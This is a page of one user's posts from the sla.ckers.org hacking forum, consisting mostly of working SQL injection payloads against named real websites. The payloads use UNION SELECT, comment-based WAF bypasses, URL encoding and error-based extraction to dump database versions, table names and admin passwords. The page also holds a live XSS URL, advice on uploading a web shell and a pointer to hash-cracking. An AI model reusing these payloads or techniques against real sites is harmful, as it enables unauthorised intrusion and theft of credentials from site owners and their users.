Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 38
8 months ago
hack2012
repeat post ? onerror=alert(1);
Forum: XSS Info
8 months ago
hack2012
maybe you can onclick=alert(1);
Forum: XSS Info
8 months ago
hack2012
sorry , you can't ....
Forum: XSS Info
8 months ago
hack2012
thanks a lot !
Forum: XSS Info
8 months ago
hack2012
where is the url???
Forum: SQL and Code Injection
11 months ago
hack2012
http://www.loytee.com/productDetail.php?ProductId={44439D22-59FB-15FC-692C-DE45EAE180EC}' UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16%23
Forum: SQL and Code Injection
11 months ago
hack2012
you can use URLencode to bypass it http://www.livsupplies.co.uk/product_list.php?id=11 UNION SELECT 1,2,%61dmin_firstname,4,5,%61dmin_password,7+from+admin-- for more details, please visit: http://www.waitalone.cn/waf-bypass-the-url-encoding-method.html
Forum: SQL and Code Injection
11 months ago
hack2012
Yes,it is. http://www.wowsoc.org/devzone/?assigned=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
Forum: CSRF and Session Info
11 months ago
hack2012
http://pardumansinghjewellers.com/product_detail.php?id=29 and 0/*!12345UNION*/ SELECT 1,2,@@version,4,5,6 5.5.28-29.1 http://pardumansinghjewellers.com/product_detail.php?id=29 and 0/*!12345UNION*//*!12345SELECT*/ 1,2,table_name,4,5,6 from /*!12345information_schema.tables*/ where table_schema=database() limit 0,1 change 0,1 to 1,1 then you will find the diff
Forum: SQL and Code Injection
11 months ago
hack2012
http://www.dkprintworld.com/product-detail.php?pid=-1280857046 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,/*!12345concat*/(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,version(),46,47,48,49,50,51,52,53,54,55,56+from /*!50000information_schema*/.tables where table_schema=database() Just use "concat" function
Forum: SQL and Code Injection
1 year ago
hack2012
where is the url ?
Forum: CSRF and Session Info
1 year ago
hack2012
maybe it's not allowed to execute php in this folder ... upload shell to other folder
Forum: SQL and Code Injection
1 year ago
hack2012
mysql encode ... http://www.cmd5.com/
Forum: SQL and Code Injection
1 year ago
hack2012
if you found, and root user not deny your ip, you can link it with sql client.
Forum: SQL and Code Injection
1 year ago
hack2012
login=nop") union select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28;#&pass=nop user = c1bc_cp_dba@localhost it's not root there is no file_priv to load_file or into outfile... so you must to get the username and password from admin table.
Forum: SQL and Code Injection
1 year ago
hack2012
楼主是中国的?
Forum: SQL and Code Injection
1 year ago
hack2012
http://www.aristocars.com.pk/Car.php?id=-250 /*!12346UnioN*/ all select 1,2,@@version
Forum: SQL and Code Injection
1 year ago
hack2012
http://sellbyowners.com.pk/property_view.php?cityid=66&city=Haripur&id=123' or+1+group+by+concat_ws(0x7e,@@version,floor(rand(0)*2))+having+min(0)+or+1%23
Forum: SQL and Code Injection
1 year ago
hack2012
thanks
Forum: Obfuscation
1 year ago
hack2012
Thanks, it's very useful for me !
Forum: Obfuscation
1 year ago
hack2012
Please read it again ... if you want test csrf ,you must konw about the webserver how to add a user or the other operation, then you can make a webform ****** and so on Maybe dvwa can help you !
Forum: CSRF and Session Info
1 year ago
hack2012
Good idear , THanks ... anybody who want's to read more about CSRF: http://seclab.stanford.edu/websec/csrf/ Chinese version: http://www.waitalone.cn/csrf-cross-site-request-forgery-defense.html
Forum: CSRF and Session Info
1 year ago
hack2012
and extractvalue(1, concat(0x7e, (select @@version),0x7e)) and extractvalue(1, concat(0x7e, (select user()),0x7e))
Forum: SQL and Code Injection
1 year ago
hack2012
I am sorry .. https://www.rumo.com.br/sistema/adm/CodigoFonte.asp?path=/&arq=aux
Forum: SQL and Code Injection
1 year ago
hack2012
http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' UNION SELECT 1,2,3,4,5,6,7,version(),9,10,11,12--+ 5.5.17 http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' and (select 1)=(select 0xA)+UNION SELECT 1,2,3,4,5,6,7,database(),9,10,11,12--+ redc http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' and (select 1)=(select 0xA)+UNION SELEC
Forum: SQL and Code Injection
1 year ago
hack2012
on table users
Forum: SQL and Code Injection
1 year ago
hack2012
I want to try , can you sent it to me ???
Forum: SQL and Code Injection
1 year ago
hack2012
may be you can try : -7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,user_id,4,5,6,7,8,9+from+user-- or -7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!user_id*/,4,5,6,7,8,9+from+user--
Forum: SQL and Code Injection
1 year ago
hack2012
id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!%0Agroup_concat*/(/*!%0Atable_name*/),4,5,6,7,8,9 from /*!%0Ainformation_schema*/./*!%0Atables*/ where /*!%0Atable_schema*/=/*!%0Adatabase()*/-- maybe ok , or you can give me the URL.....
Forum: SQL and Code Injection
1 year ago
hack2012
http://www.cobra.com.dz/produits_cat_detail.php?id=-325 /*!%0aUNION*/ /*!%0aSELECT*/ 1,2,3,version(),5--
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2